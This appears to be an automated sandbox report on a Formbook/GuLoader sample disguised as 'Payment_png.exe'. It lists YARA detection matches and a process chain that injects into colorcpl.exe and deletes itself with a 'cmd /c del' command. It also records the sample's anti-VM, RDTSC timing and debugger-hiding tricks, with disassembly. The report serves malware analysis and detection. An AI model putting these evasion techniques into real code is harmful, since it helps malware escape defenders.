      Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.472974211.0000000005117000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.470737147.0000000003032000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@13/7
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1560:120:WilError_01
      Source: C:\Users\user\Desktop\Payment_png.exeFile created: C:\Users\user\AppData\Local\Temp\~DF404ACC61CD765358.TMPJump to behavior
      Source: Payment_png.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Payment_png.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\Payment_png.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\Payment_png.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Payment_png.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Payment_png.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Payment_png.exeVirustotal: Detection: 70%
      Source: Payment_png.exeMetadefender: Detection: 19%
      Source: Payment_png.exeReversingLabs: Detection: 79%
      Source: unknownProcess created: C:\Users\user\Desktop\Payment_png.exe 'C:\Users\user\Desktop\Payment_png.exe'
      Source: C:\Users\user\Desktop\Payment_png.exeProcess created: C:\Users\user\Desktop\Payment_png.exe 'C:\Users\user\Desktop\Payment_png.exe'
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment_png.exe'
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Payment_png.exeProcess created: C:\Users\user\Desktop\Payment_png.exe 'C:\Users\user\Desktop\Payment_png.exe'
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment_png.exe'
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Binary string: colorcpl.pdbGCTL source: Payment_png.exe, 00000002.00000002.305994163.00000000000B0000.00000040.00000001.sdmp
      Source: Binary string: colorcpl.pdb source: Payment_png.exe, 00000002.00000002.305994163.00000000000B0000.00000040.00000001.sdmp
      Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000006.00000000.294257037.000000000F785000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.294003338.000000000E350000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: Payment_png.exe, 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, colorcpl.exe, 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: Payment_png.exe, colorcpl.exe
      Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000006.00000000.294257037.000000000F785000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.294003338.000000000E350000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: Payment_png.exe PID: 3112, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Payment_png.exe PID: 6076, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: Payment_png.exe PID: 3112, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Payment_png.exe PID: 6076, type: MEMORY
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_00408843 push esp; iretd
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_00405E7A push esp; iretd
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_004050B4 push esp; iretd
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_00408944 push esp; iretd
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3FD0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C5D0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_00960109 push ss; ret
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_00965268 push esp; iretd
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0096B3B5 push eax; ret
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0096B402 push eax; ret
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0096B40B push eax; ret
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0096B46C push eax; ret
      Source: C:\Users\user\Desktop\Payment_png.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Payment_png.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Payment_png.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02222C06
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_00562C06
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\Payment_png.exeRDTSC instruction interceptor: First address: 00000000022201BA second address: 00000000022201BA instructions:
      Source: C:\Users\user\Desktop\Payment_png.exeRDTSC instruction interceptor: First address: 0000000002224607 second address: 0000000002224607 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FEA74E07F08h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f dec dword ptr [ebp+000000F8h] 0x00000025 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000002c jne 00007FEA74E07EECh 0x0000002e call 00007FEA74E07F77h 0x00000033 call 00007FEA74E07F18h 0x00000038 lfence 0x0000003b mov edx, dword ptr [7FFE0014h] 0x00000041 lfence 0x00000044 ret 0x00000045 mov esi, edx 0x00000047 pushad 0x00000048 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exeRDTSC instruction interceptor: First address: 0000000002222CE8 second address: 0000000002222CE8 instructions:
      Source: C:\Users\user\Desktop\Payment_png.exeRDTSC instruction interceptor: First address: 0000000002222DFA second address: 0000000002222DFA instructions:
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\Payment_png.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Payment_png.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\Payment_png.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Payment_png.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: Payment_png.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\Payment_png.exeRDTSC instruction interceptor: First address: 00000000022201BA second address: 00000000022201BA instructions:
      Source: C:\Users\user\Desktop\Payment_png.exeRDTSC instruction interceptor: First address: 0000000002224607 second address: 0000000002224607 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FEA74E07F08h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f dec dword ptr [ebp+000000F8h] 0x00000025 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000002c jne 00007FEA74E07EECh 0x0000002e call 00007FEA74E07F77h 0x00000033 call 00007FEA74E07F18h 0x00000038 lfence 0x0000003b mov edx, dword ptr [7FFE0014h] 0x00000041 lfence 0x00000044 ret 0x00000045 mov esi, edx 0x00000047 pushad 0x00000048 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exeRDTSC instruction interceptor: First address: 0000000002224627 second address: 0000000002224627 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FEA74DAB2BFh 0x0000001d popad 0x0000001e call 00007FEA74DAAF98h 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exeRDTSC instruction interceptor: First address: 00000000022244B4 second address: 0000000002224627 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 add dword ptr [ebp+0000009Ch], 01h 0x0000000a add edi, edx 0x0000000c dec ecx 0x0000000d test ebx, 6012DFB5h 0x00000013 cmp ecx, 00000000h 0x00000016 jne 00007FEA74E07EA8h 0x00000018 push ecx 0x00000019 call 00007FEA74E07FB1h 0x0000001e call 00007FEA74E08000h 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exeRDTSC instruction interceptor: First address: 0000000002222CE8 second address: 0000000002222CE8 instructions:
      Source: C:\Users\user\Desktop\Payment_png.exeRDTSC instruction interceptor: First address: 0000000002222DFA second address: 0000000002222DFA instructions:
      Source: C:\Users\user\Desktop\Payment_png.exeRDTSC instruction interceptor: First address: 0000000000564627 second address: 0000000000564627 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FEA74DAB2BFh 0x0000001d popad 0x0000001e call 00007FEA74DAAF98h 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exeRDTSC instruction interceptor: First address: 00000000005644B4 second address: 0000000000564627 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 add dword ptr [ebp+0000009Ch], 01h 0x0000000a add edi, edx 0x0000000c dec ecx 0x0000000d test ebx, 6012DFB5h 0x00000013 cmp ecx, 00000000h 0x00000016 jne 00007FEA74E07EA8h 0x00000018 push ecx 0x00000019 call 00007FEA74E07FB1h 0x0000001e call 00007FEA74E08000h 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000009585E4 second address: 00000000009585EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 000000000095897E second address: 0000000000958984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02220604 rdtsc
      Source: C:\Windows\explorer.exe TID: 3096Thread sleep time: -40000s >= -30000s
      Source: C:\Windows\SysWOW64\colorcpl.exe TID: 632Thread sleep time: -34000s >= -30000s
      Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 00000006.00000000.290185657.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000006.00000000.290185657.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
      Source: explorer.exe, 00000006.00000000.289998327.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000006.00000000.289700052.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000006.00000002.481359451.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
      Source: explorer.exe, 00000006.00000000.290185657.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
      Source: explorer.exe, 00000006.00000000.290185657.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000006.00000000.290294461.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: explorer.exe, 00000006.00000000.289700052.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: Payment_png.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000006.00000000.289700052.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000006.00000000.289700052.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\Payment_png.exeProcess information queried: ProcessInformation

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02220438 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\Payment_png.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Payment_png.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Payment_png.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Payment_png.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\Payment_png.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\Payment_png.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02220604 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_022228D0 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02222415 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02224B11 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02221369 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02224377 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_022219A3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02221986 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02223BE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D8E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E461608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E45FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E45FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E478ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E43FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D16E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E470EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E470EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E470EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4246A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D36CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E8EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DE730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CF716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E478F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E47070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E47070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E43FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E43FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E37F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E427794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E427794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E427794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DBC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E43C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E43C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]
